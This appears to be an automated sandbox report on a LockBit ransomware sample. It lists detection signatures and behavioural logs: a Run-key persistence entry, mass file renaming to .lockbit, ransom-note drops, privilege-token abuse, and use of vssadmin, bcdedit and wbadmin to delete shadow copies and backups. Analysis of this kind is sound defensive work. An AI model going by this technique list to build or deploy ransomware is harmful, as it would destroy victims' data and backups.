Malware Analysis Report

2024-11-30 11:30

Sample ID 240229-jxc45aba3y
Target file.None.0xfffffa801c116990.mal.exe.img
SHA256 5988e75518b2f365671dc49da18b5a70274351721f1f3a8f8f7bf32984e4024c
Tags
lockbit evasion persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5988e75518b2f365671dc49da18b5a70274351721f1f3a8f8f7bf32984e4024c

Threat Level: Known bad

The file file.None.0xfffffa801c116990.mal.exe.img was found to be: Known bad.

Malicious Activity Summary

lockbit evasion persistence ransomware

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Lockbit

Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware

Modifies boot configuration data using bcdedit

Renames multiple (9371) files with added filename extension

Renames multiple (14166) files with added filename extension

Deletes shadow copies

Deletes backup catalog

Deletes itself

Checks computer location settings

Enumerates connected drives

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Sets desktop wallpaper using registry

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies Control Panel

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-29 08:02

Signatures

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-29 08:02

Reported

2024-02-29 08:05

Platform

win7-20240220-en

Max time kernel

118s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (9371) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\file.None.0xfffffa801c116990.mal.exe\"" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5071.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00703L.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGTEAR.DPV.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\wmplayer.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\de-DE\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Asia\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\es-ES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL109.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\CHICAGO.XSL.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\autoconfig.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
